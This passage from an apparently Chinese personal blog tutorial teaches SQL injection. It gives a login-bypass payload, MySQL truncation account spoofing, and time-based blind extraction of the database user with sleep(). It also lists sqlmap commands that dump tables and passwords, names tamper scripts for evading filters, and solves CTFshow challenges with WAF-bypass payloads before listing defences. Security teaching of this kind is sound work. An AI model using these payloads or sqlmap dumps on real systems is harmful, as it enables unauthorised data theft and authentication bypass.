<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs sql">初始执行语句:<br>    <span class="hljs-keyword">select</span> <span class="hljs-operator">*</span> <span class="hljs-keyword">from</span> <span class="hljs-keyword">user</span> <span class="hljs-keyword">where</span> name<span class="hljs-operator">=</span><span class="hljs-string">&#x27;&#x27;</span> <span class="hljs-keyword">and</span> pass<span class="hljs-operator">=</span><span class="hljs-string">&#x27;&#x27;</span><br><br>payload:<br>    ?name<span class="hljs-operator">=</span><span class="hljs-number">1</span><span class="hljs-operator">&amp;</span>pass<span class="hljs-operator">=</span><span class="hljs-number">1</span><span class="hljs-operator">%</span><span class="hljs-number">1</span>$<span class="hljs-string">&#x27; or %1$&#x27;</span><span class="hljs-number">1</span><span class="hljs-operator">%</span><span class="hljs-number">1</span>$<span class="hljs-string">&#x27;=%1$&#x27;</span><span class="hljs-number">1</span><br><br>注入后语句：<br>    <span class="hljs-keyword">select</span> <span class="hljs-operator">*</span> <span class="hljs-keyword">from</span> <span class="hljs-keyword">user</span> <span class="hljs-keyword">where</span> name<span class="hljs-operator">=</span><span class="hljs-string">&#x27;1&#x27;</span> <span class="hljs-keyword">and</span> pass<span class="hljs-operator">=</span><span class="hljs-string">&#x27;1&#x27;</span> <span class="hljs-keyword">or</span> <span class="hljs-string">&#x27;1&#x27;</span><span class="hljs-operator">=</span><span class="hljs-string">&#x27;1&#x27;</span><br></code></pre></td></tr></table></figure>
<p>使用以下测试语句可以判断是否存在空格过滤：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-number">1</span> <span class="hljs-keyword">or</span> <span class="hljs-number">1</span><span class="hljs-operator">=</span><span class="hljs-number">1</span><br><span class="hljs-number">1</span> <span class="hljs-keyword">or</span><br></code></pre></td></tr></table></figure>
<p>若两次测试均出现sql inject error报错，则说明页面存在空格过滤规则，<br>使用&#x2F;**&#x2F;、’+’、%09均可替换空格绕过过滤；</p>
<h2 id="长字符截断"><a href="#长字符截断" class="headerlink" title="长字符截断"></a>长字符截断</h2><p>MySQL中有一个名为sql_mode的选项；<br>当sql_mode设置为default，即STRICT_ALL_TABLES选项没有开启时，MySQL对超长插入只会显示警告而不会报错，这可能会导致截断问题；</p>
<p>比如我们新建一张表：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">CREATE</span> <span class="hljs-keyword">TABLE</span> USERS(<br>    id <span class="hljs-type">int</span>(<span class="hljs-number">11</span>) <span class="hljs-keyword">NOT</span> <span class="hljs-keyword">NULL</span>,<br>    username <span class="hljs-type">varchar</span>(<span class="hljs-number">7</span>) <span class="hljs-keyword">NOT</span> <span class="hljs-keyword">NULL</span>,  # 设置规定长度为<span class="hljs-number">7</span><br>    password <span class="hljs-type">varchar</span>(<span class="hljs-number">12</span>) <span class="hljs-keyword">NOT</span> <span class="hljs-keyword">NULL</span><br>)<br></code></pre></td></tr></table></figure>
<p>插入正常语句：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs sql">mysql<span class="hljs-operator">&gt;</span> <span class="hljs-keyword">insert</span> <span class="hljs-keyword">into</span> users(id, username, password) <span class="hljs-keyword">values</span>(<span class="hljs-number">1</span>, <span class="hljs-string">&#x27;admin&#x27;</span>, <span class="hljs-string">&#x27;admin&#x27;</span>);<br>Query OK. i <span class="hljs-type">row</span> affected (<span class="hljs-number">0.00</span> sec)    # 成功插入，无警告<br></code></pre></td></tr></table></figure>
<p>插入错误语句（长度为8，已超出规定长度）：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs sql">mysql<span class="hljs-operator">&gt;</span> <span class="hljs-keyword">insert</span> <span class="hljs-keyword">into</span> users(id, username, password) <span class="hljs-keyword">values</span>(<span class="hljs-number">2</span>, <span class="hljs-string">&#x27;admin   &#x27;</span>, <span class="hljs-string">&#x27;admin&#x27;</span>);<br>Query OK. i <span class="hljs-type">row</span> affected, <span class="hljs-number">1</span> warning (<span class="hljs-number">0.00</span> sec)    # 成功插入，一个警告<br></code></pre></td></tr></table></figure>
<p>插入错误语句（长度为9，已超出规定长度）：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs sql">mysql<span class="hljs-operator">&gt;</span> <span class="hljs-keyword">insert</span> <span class="hljs-keyword">into</span> users(id, username, password) <span class="hljs-keyword">values</span>(<span class="hljs-number">2</span>, <span class="hljs-string">&#x27;admin   x&#x27;</span>, <span class="hljs-string">&#x27;admin&#x27;</span>);<br>Query OK. i <span class="hljs-type">row</span> affected, <span class="hljs-number">1</span> warning (<span class="hljs-number">0.00</span> sec)    # 成功插入，一个警告<br></code></pre></td></tr></table></figure>
<p>验证：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs sql">mysql<span class="hljs-operator">&gt;</span> <span class="hljs-keyword">select</span> username <span class="hljs-keyword">from</span> users;<br><span class="hljs-operator">+</span><span class="hljs-comment">------------+</span><br><span class="hljs-operator">|</span>  username  <span class="hljs-operator">|</span><br><span class="hljs-operator">+</span><span class="hljs-comment">------------+</span><br><span class="hljs-operator">|</span>  admin     <span class="hljs-operator">|</span><br><span class="hljs-operator">|</span>  admin     <span class="hljs-operator">|</span><br><span class="hljs-operator">|</span>  admin     <span class="hljs-operator">|</span><br><span class="hljs-operator">+</span><span class="hljs-comment">------------+</span><br></code></pre></td></tr></table></figure>
<p>已成功插入;<br>此时如果执行登录判断语句，非管理员账号”admin   “和”admin   x”均可以登录到管理员界面；</p>
<p>由此可知，在默认情况下，如果数据超出列默认长度，MySQL会自动将其截断，这可能会导致一些安全问题；</p>
<h2 id="布尔盲注"><a href="#布尔盲注" class="headerlink" title="布尔盲注"></a>布尔盲注</h2><p>通过修改输入参数并观察应用程序的响应（通常是页面返回错误或空白页），利用SQL语句的逻辑（如EXISTS、AND、OR等）推断出数据库中的信息；</p>
<h2 id="延时盲注"><a href="#延时盲注" class="headerlink" title="延时盲注"></a>延时盲注</h2><p>基于时间差的一种盲注技术，利用SQL中的延时函数制造查询延时，<br>通过观察页面响应时间来推断SQL语句是否被执行；<br>MySQL有一个函数：SLEEP(duration)，用于在规定秒数duration后执行语句：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">select</span> <span class="hljs-operator">*</span> <span class="hljs-keyword">from</span> users <span class="hljs-keyword">where</span> id<span class="hljs-operator">=</span><span class="hljs-number">1</span> <span class="hljs-keyword">and</span> sleep(<span class="hljs-number">3</span>);<br></code></pre></td></tr></table></figure>
<p>我们可以通过这个函数判断网页是否存在SQL注入漏洞；</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs sql">?id<span class="hljs-operator">=</span><span class="hljs-number">1</span>                # 正常执行，耗时<span class="hljs-number">1</span>秒<br>?id<span class="hljs-operator">=</span><span class="hljs-number">1</span> <span class="hljs-string">&#x27;              # 正常执行，耗时1秒</span><br><span class="hljs-string">?id=1 &#x27;</span> <span class="hljs-keyword">and</span> <span class="hljs-number">1</span><span class="hljs-operator">=</span><span class="hljs-number">1</span>      # 正常执行，耗时<span class="hljs-number">1</span>秒<br>?id<span class="hljs-operator">=</span><span class="hljs-number">1</span> <span class="hljs-keyword">and</span> sleep(<span class="hljs-number">3</span>)   # 正常执行，耗时<span class="hljs-number">3</span>秒<br></code></pre></td></tr></table></figure>
<p>通过页面响应的时间可以判断出sleep()被执行，当前网页存在SQL注入漏洞；<br>我们可以通过延时注入，读取当前MySQL用户：</p>
<ol>
<li>查询当前用户，取得字符串长度<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">and</span> if(length(<span class="hljs-keyword">user</span>())<span class="hljs-operator">=</span><span class="hljs-number">0</span>, sleep(<span class="hljs-number">3</span>), <span class="hljs-number">1</span>)<br></code></pre></td></tr></table></figure>
若出现3秒延时，则可以判断出user字符串的长度，注入时一般使用穷举法或者二分法；</li>
<li>截取字符串的第一个字符，转换为ASCII码<br>取出user字符串的第一个字，与ASCII码循环对比；<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">and</span> if(hex(mid(<span class="hljs-keyword">user</span>(),<span class="hljs-number">1</span>,<span class="hljs-number">1</span>))<span class="hljs-operator">=</span><span class="hljs-number">1</span>, sleep(<span class="hljs-number">3</span>), <span class="hljs-number">1</span>)<br></code></pre></td></tr></table></figure></li>
<li>将第一个字符的ASCII与ASCII码表对比，如果对比成功就延时3秒；<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">and</span> if(hex(mid(<span class="hljs-keyword">user</span>(),L,<span class="hljs-number">1</span>))<span class="hljs-operator">=</span>N, sleep(<span class="hljs-number">3</span>), <span class="hljs-number">1</span>)   # L代表字符串中的第几个字符，N代表对应的ASCII码<br></code></pre></td></tr></table></figure></li>
<li>循环执行第二步和第三步，直到字符串截取完毕，成功获取用户名；</li>
</ol>
<h2 id="堆叠盲注"><a href="#堆叠盲注" class="headerlink" title="堆叠盲注"></a>堆叠盲注</h2><h1 id="注入芝士-认识sqlmap"><a href="#注入芝士-认识sqlmap" class="headerlink" title="注入芝士-认识sqlmap"></a>注入芝士-认识sqlmap</h1><p>搞SQL注入，sqlmap无疑是你的得力助手；</p>
<h2 id="适用情形"><a href="#适用情形" class="headerlink" title="适用情形"></a>适用情形</h2><ol>
<li>布尔盲注；</li>
<li>延时盲注；</li>
<li>报错注入；</li>
<li>联合查询注入；</li>
<li>多语句查询注入；</li>
</ol>
<h2 id="基本命令"><a href="#基本命令" class="headerlink" title="基本命令"></a>基本命令</h2><ol>
<li>判断数据库类型：<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs sql">sqlmap <span class="hljs-operator">-</span>u URL<br>sqlmap <span class="hljs-operator">-</span>u URL1 <span class="hljs-comment">--referer URL2 --batch</span><br></code></pre></td></tr></table></figure></li>
<li>查询当前用户下的所有数据库：<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs sql">sqlmap <span class="hljs-operator">-</span>u URL <span class="hljs-comment">--dbs</span><br>sqlmap <span class="hljs-operator">-</span>u URL1 <span class="hljs-comment">--referer URL2 --dbs --batch</span><br></code></pre></td></tr></table></figure></li>
<li>获取数据库中的表名：<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs sql">sqlmap <span class="hljs-operator">-</span>u URL <span class="hljs-operator">-</span>D dbName <span class="hljs-comment">--tables</span><br>sqlmap <span class="hljs-operator">-</span>u URL1 <span class="hljs-comment">--referer URL2 -D dbName --tables --batch</span><br></code></pre></td></tr></table></figure></li>
<li>获取表中字段名：<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs sql">sqlmap <span class="hljs-operator">-</span>u URL <span class="hljs-operator">-</span>D dbName <span class="hljs-operator">-</span>T TableName <span class="hljs-comment">--columns</span><br>sqlmap <span class="hljs-operator">-</span>u URL1 <span class="hljs-comment">--referer URL2 -D dbName -T tableName --columns --batch</span><br></code></pre></td></tr></table></figure></li>
<li>获取字段内容：<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs sql">sqlmap <span class="hljs-operator">-</span>u URL <span class="hljs-operator">-</span>D dbName <span class="hljs-operator">-</span>T TableName <span class="hljs-operator">-</span>C username password <span class="hljs-comment">--dump</span><br>sqlmap <span class="hljs-operator">-</span>u URL1 <span class="hljs-comment">--referer URL2 -D dbName -T tableName -C columnName --dump --batch</span><br></code></pre></td></tr></table></figure></li>
<li>获取数据库所有用户：<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">sqlmap <span class="hljs-operator">-</span>u URL <span class="hljs-comment">--users</span><br></code></pre></td></tr></table></figure></li>
<li>获取数据库用户的密码：<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">sqlmap <span class="hljs-operator">-</span>u URL <span class="hljs-comment">--passwords</span><br></code></pre></td></tr></table></figure></li>
<li>获取当前网站数据库的名称：<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">sqlmap <span class="hljs-operator">-</span>u URL <span class="hljs-comment">--current -db</span><br></code></pre></td></tr></table></figure></li>
<li>获取当前网站数据库的用户名称：<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">sqlmap <span class="hljs-operator">-</span>u URL <span class="hljs-comment">--current -user</span><br></code></pre></td></tr></table></figure></li>
</ol>
<h2 id="特殊用法"><a href="#特殊用法" class="headerlink" title="特殊用法"></a>特殊用法</h2><ol>
<li>改变传输类型（GET -&gt; POST）<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">sqlmap <span class="hljs-operator">-</span>u URL <span class="hljs-comment">--data id=x</span><br></code></pre></td></tr></table></figure></li>
<li>调整请求方式（表单传输 -&gt; PUT）<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">sqlmap <span class="hljs-operator">-</span>u URL <span class="hljs-comment">--method=&quot;PUT&quot; --headers=&quot;Content-Type: text/plain&quot;</span><br></code></pre></td></tr></table></figure></li>
<li>提交cookie数据<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">sqlmap <span class="hljs-operator">-</span>u URL <span class="hljs-comment">--cookie=&quot;COOKIE&quot;</span><br></code></pre></td></tr></table></figure></li>
<li>api鉴权<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">sqlmap <span class="hljs-operator">-</span>u URL <span class="hljs-comment">--safe-url=URL_TOKEN --safe-freq=1</span><br></code></pre></td></tr></table></figure></li>
<li>tamper绕过<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">sqlmap <span class="hljs-operator">-</span>u URL <span class="hljs-comment">--tample xxx.py</span><br></code></pre></td></tr></table></figure>
需要调用现成的python脚本绕过正则过滤；<br>以下是一些常用脚本：<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs sql">apostrophemask.py	用utf8代替引号；<br>base64encode.py 	使用base64编码；<br>multiplespaces.py	围绕<span class="hljs-keyword">SQL</span>关键字添加多个空格；<br>space2plus.py	    用<span class="hljs-string">&#x27;+&#x27;</span>替换空格；<br>space2comment.py	用<span class="hljs-string">&#x27;/**/&#x27;</span>替换空格；<br>unionalltounion.py	替换<span class="hljs-keyword">UNION</span> <span class="hljs-keyword">ALL</span> <span class="hljs-keyword">SELECT</span> <span class="hljs-keyword">UNION</span> <span class="hljs-keyword">SELECT</span>；<br>securesphere.py  	追加特制的字符串；<br>equaltolike.py	    用<span class="hljs-string">&#x27;like&#x27;</span>代替<span class="hljs-string">&#x27;=&#x27;</span>；<br>greatest.py  	    用GREATEST替换<span class="hljs-string">&#x27;&gt;&#x27;</span>；<br>space2mssqlhash.py	替换空格；<br>between.py      	用<span class="hljs-keyword">between</span>替换<span class="hljs-string">&#x27;&gt;&#x27;</span>；<br>randomcase.py	    使用随机大小写，绕过关键词过滤；<br>versionedmorekeywords.py	    注释绕过；<br>halfversionedmorekeywords.py	在关键字前加注释；<br>space2morehash.py	            将空格替换为<span class="hljs-string">&#x27;#&#x27;</span>以及更多随机字符串换行符；<br></code></pre></td></tr></table></figure>
当然，当过滤严格时，有必要自行修改python脚本绕过过滤；</li>
</ol>
<h1 id="举些例子（常规注入，使用sqlmap是没有灵魂的）"><a href="#举些例子（常规注入，使用sqlmap是没有灵魂的）" class="headerlink" title="举些例子（常规注入，使用sqlmap是没有灵魂的）"></a>举些例子（常规注入，使用sqlmap是没有灵魂的）</h1><p><strong>（以下题目均来自CTFshow）</strong></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs sql">查询语句：<br><span class="hljs-operator">/</span><span class="hljs-operator">/</span>拼接<span class="hljs-keyword">sql</span>语句查找指定ID用户<br>$<span class="hljs-keyword">sql</span> <span class="hljs-operator">=</span> &quot;select username,password from ctfshow_user2 where username !=&#x27;flag&#x27; and id = &#x27;&quot;.$_GET[<span class="hljs-string">&#x27;id&#x27;</span>].&quot;&#x27; limit 1;&quot;;<br><br>返回逻辑：<br><span class="hljs-operator">/</span><span class="hljs-operator">/</span>检查结果是否有flag<br>    if($<span class="hljs-type">row</span><span class="hljs-operator">-</span><span class="hljs-operator">&gt;</span>username<span class="hljs-operator">!=</span><span class="hljs-operator">=</span><span class="hljs-string">&#x27;flag&#x27;</span>)&#123;<br>      $ret[<span class="hljs-string">&#x27;msg&#x27;</span>]<span class="hljs-operator">=</span><span class="hljs-string">&#x27;查询成功&#x27;</span>;<br>    &#125;<br><br>payload:<br>    <span class="hljs-number">1</span><span class="hljs-string">&#x27; union select 1, password from ctfshow_user2 --+</span><br></code></pre></td></tr></table></figure>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><code class="hljs sql">查询语句：<br><span class="hljs-operator">/</span><span class="hljs-operator">/</span>拼接<span class="hljs-keyword">sql</span>语句查找指定ID用户<br>$<span class="hljs-keyword">sql</span> <span class="hljs-operator">=</span> &quot;select username,password from ctfshow_user4 where username !=&#x27;flag&#x27; and id = &#x27;&quot;.$_GET[<span class="hljs-string">&#x27;id&#x27;</span>].&quot;&#x27; limit 1;&quot;;<br><br>返回逻辑：<br><span class="hljs-operator">/</span><span class="hljs-operator">/</span>检查结果是否有flag<br>    if(<span class="hljs-operator">!</span>preg_match(<span class="hljs-string">&#x27;/flag|[0-9]/i&#x27;</span>, json_encode($ret)))&#123;<br>      $ret[<span class="hljs-string">&#x27;msg&#x27;</span>]<span class="hljs-operator">=</span><span class="hljs-string">&#x27;查询成功&#x27;</span>;<br>    &#125;<br><br>解题思路：<br>    对于flag过滤，可以通过base64编码绕过；<br>    对于数字过滤，利用replace()函数替换掉返回值中的数字，再将查询到的flag中被替换的字符恢复成原本模样；<br><br>payload:<br>    <span class="hljs-string">&#x27; union select to_base64(username),REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(password,9,&#x27;</span>I<span class="hljs-string">&#x27;),8,&#x27;</span>H<span class="hljs-string">&#x27;),7,&#x27;</span>G<span class="hljs-string">&#x27;),6,&#x27;</span>F<span class="hljs-string">&#x27;),5,&#x27;</span>E<span class="hljs-string">&#x27;),4,&#x27;</span>D<span class="hljs-string">&#x27;),3,&#x27;</span>C<span class="hljs-string">&#x27;),2,&#x27;</span>B<span class="hljs-string">&#x27;),1,&#x27;</span>A<span class="hljs-string">&#x27;) ,0,&#x27;</span>J<span class="hljs-string">&#x27;) from ctfshow_user4 %23</span><br></code></pre></td></tr></table></figure>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-operator">/</span><span class="hljs-operator">/</span>拼接<span class="hljs-keyword">sql</span>语句查找指定ID用户<br>查询语句：<br>$<span class="hljs-keyword">sql</span> <span class="hljs-operator">=</span> &quot;select id,username,password from ctfshow_user where username !=&#x27;flag&#x27; and id = &#x27;&quot;.$_GET[<span class="hljs-string">&#x27;id&#x27;</span>].&quot;&#x27; limit 1;&quot;;<br><br>返回逻辑<br><span class="hljs-operator">/</span><span class="hljs-operator">/</span>对传入的参数进行了过滤<br>  <span class="hljs-keyword">function</span> waf($str)&#123;<br>   <span class="hljs-operator">/</span><span class="hljs-operator">/</span>代码过于简单，不宜展示<br>  &#125;<br><br>解题思路：<br>    存在黑盒过滤，试着用常规查询语句判断过滤的内容；<br><br>payload:<br>    <span class="hljs-number">1</span><span class="hljs-string">&#x27; union select 1,2,group_concat(password) from ctfshow_user--+    # 判断出过滤了空格&#x27;</span><br>    <span class="hljs-number">1</span><span class="hljs-string">&#x27;%09union%09select%09password,2,3%09from%09ctfshow_user%23        # 使用tab键代替空格&#x27;</span><br></code></pre></td></tr></table></figure>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-operator">/</span><span class="hljs-operator">/</span>拼接<span class="hljs-keyword">sql</span>语句查找指定ID用户<br>$<span class="hljs-keyword">sql</span> <span class="hljs-operator">=</span> &quot;select id,username,password from ctfshow_user where username !=&#x27;flag&#x27; and id = &#x27;&quot;.$_GET[<span class="hljs-string">&#x27;id&#x27;</span>].&quot;&#x27; limit 1;&quot;;<br><br>返回逻辑<br><span class="hljs-operator">/</span><span class="hljs-operator">/</span>对传入的参数进行了过滤<br>  <span class="hljs-keyword">function</span> waf($str)&#123;<br>    <span class="hljs-keyword">return</span> preg_match(<span class="hljs-string">&#x27;/ |\*|\x09|\x0a|\x0b|\x0c|\x00|\x0d|\xa0|\x23|\#|file|into|select/i&#x27;</span>, $str);<br>  &#125;<br><br>payload1:<br>    <span class="hljs-number">-1</span><span class="hljs-string">&#x27;%0cor%0cusername%0clike%0c&#x27;</span>flag<br><br>payload2:<br>    <span class="hljs-number">-1</span><span class="hljs-string">&#x27;or(username=concat(&#x27;</span>fl<span class="hljs-string">&#x27;,&#x27;</span>ag<span class="hljs-string">&#x27;))and&#x27;</span>a<span class="hljs-string">&#x27;=&#x27;</span>a<br></code></pre></td></tr></table></figure>

<p>WP参考链接：<br>    <a target="_blank" rel="noopener" href="https://blog.csdn.net/uuzeray/article/details/135839128">https://blog.csdn.net/uuzeray/article/details/135839128</a><br>    <a target="_blank" rel="noopener" href="https://blog.csdn.net/Myon5/article/details/141040539">https://blog.csdn.net/Myon5/article/details/141040539</a></p>
<h1 id="注入的危害"><a href="#注入的危害" class="headerlink" title="注入的危害"></a>注入的危害</h1><ol>
<li>非法读取、篡改、添加、删减数据库中的数据；</li>
<li>规避认证；</li>
<li>通过修改数据库，篡改网页内容；</li>
<li>私自盗取用户信息、添加或删除账号；</li>
<li>注入木马程序；</li>
</ol>
<h1 id="防护策略"><a href="#防护策略" class="headerlink" title="防护策略"></a>防护策略</h1><ol>
<li>过滤单引号；</li>
<li>对所有来自外部的用户输入进行安全检查以及过滤；</li>
<li>使用类型安全的参数编码机制构造动态SQL语句；</li>
<li>尽量不使用动态拼接的SQL，使用参数化的SQL；</li>
<li>采用一系列安全措施加强的SQL服务器的配置与链接；</li>
<li>使用预编译功能封装编译查询语句；</li>
</ol>
<h5 id="SQL注入攻击一般通过目标服务器80端口进行，产生的请求信息与常规网页访问没有什么区别，所以一般的防火墙不会进行警告或拦截。"><a href="#SQL注入攻击一般通过目标服务器80端口进行，产生的请求信息与常规网页访问没有什么区别，所以一般的防火墙不会进行警告或拦截。" class="headerlink" title="SQL注入攻击一般通过目标服务器80端口进行，产生的请求信息与常规网页访问没有什么区别，所以一般的防火墙不会进行警告或拦截。"></a>SQL注入攻击一般通过目标服务器80端口进行，产生的请求信息与常规网页访问没有什么区别，所以一般的防火墙不会进行警告或拦截。</h5><h1 id=""><a href="#" class="headerlink" title="&lt;- To be continued  _(:3 ∠)__"></a>&lt;- To be continued  _(:3 ∠)__</h1><pre>
  く__,.ヘヽ.        /  ,ー､ 〉
           ＼ ', !-─‐-i  /  /´
           ／｀ｰ'       L/／｀ヽ､
         /   ／,   /|   ,   ,       ',
       ｲ   / /-‐/  ｉ  L_ ﾊ ヽ!   i
        ﾚ ﾍ 7ｲ｀ﾄ   ﾚ'ｧ-ﾄ､!ハ|   |
          !,/7 '0'     ´0iソ|    |
          |.从"    _     ,,,, / |./    |
          ﾚ'| i＞.､,,__  _,.イ /   .i   |
            ﾚ'| | / k_７_/ﾚ'ヽ,  ﾊ.  |
              | |/i 〈|/   i  ,.ﾍ |  i  |
             .|/ /  ｉ：    ﾍ!    ＼  |
              kヽ>､ﾊ    _,.ﾍ､    /､!
              !'〈//｀Ｔ´', ＼ ｀'7'ｰr'
              ﾚ'ヽL__|___i,___,ンﾚ|ノ
                  ﾄ-,/  |___./
                  'ｰ'    !_,.:
</pre><div id="paginator"></div></div><div id="post-footer"><div id="pages"><div class="footer-link" style="width: 50%;text-align:right;border-right:1px #fe2 solid"><a href="/blog233.github.io/2024/11/10/PHP%E5%A4%A7%E6%8E%92%E6%A1%A3/">← Next PHP大排档</a></div><div class="footer-link" style="width: 50%;right:1px;border-left:1px #fe2 solid"><a href="/blog233.github.io/2024/10/02/%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/">漏洞利用 Prev →</a></div></div></div></div><div class="bottom-btn"><div><a class="i-top" id="to-top" onClick="scrolls.scrolltop();" title="To Top" style="opacity: 0; display: none;">∧ </a><a class="i-index" id="to-index" href="#toc-div" title="To Catalog">≡</a><a class="i-color" id="color-mode" onClick="colorMode.change()" title="Change Theme"></a></div></div></article><aside><div id="about"><a href="/blog233.github.io/" id="logo"><img src="https://ak.hypergryph.com/assets/index/images/ak/pc/faction/1.png" alt="Logo"></a><h1 id="Dr"><a href="/">RngAd33</a></h1><div id="description"><p></p></div><div id="social-links"><a class="social" target="_blank" rel="noopener" href="https://github.com/RngAd33"><i class="fab fa-github" alt="GitHub"></i></a><a class="social" href="mailto:yxbsyx@outlook.com"><i class="fa fa-envelope" alt="E-Mail"></i></a><a class="social" target="_blank" rel="noopener" href="https://space.bilibili.com/403699403/favlist?fid=2455564303&amp;ftype=create"><i class="fa-brands fa-bilibili" alt="BiliBili"></i></a></div></div><div id="aside-block"><div id="toc-div"><h1>Catalog</h1><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E7%83%AD%E8%BA%AB%EF%BC%9A%E4%B8%87%E8%83%BD%E5%AF%86%E7%A0%81%E7%BB%95%E8%BF%87"><span class="toc-number">1.</span> <span class="toc-text">热身：万能密码绕过</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E6%88%90%E5%9B%A0"><span class="toc-number">2.</span> <span class="toc-text">漏洞成因</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%B3%A8%E5%85%A5%E7%B1%BB%E5%9E%8B"><span class="toc-number">3.</span> <span class="toc-text">注入类型</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%95%B0%E5%AD%97%E5%9E%8B%E6%B3%A8%E5%85%A5"><span class="toc-number">3.1.</span> <span class="toc-text">数字型注入</span></a></li><li class="toc-item 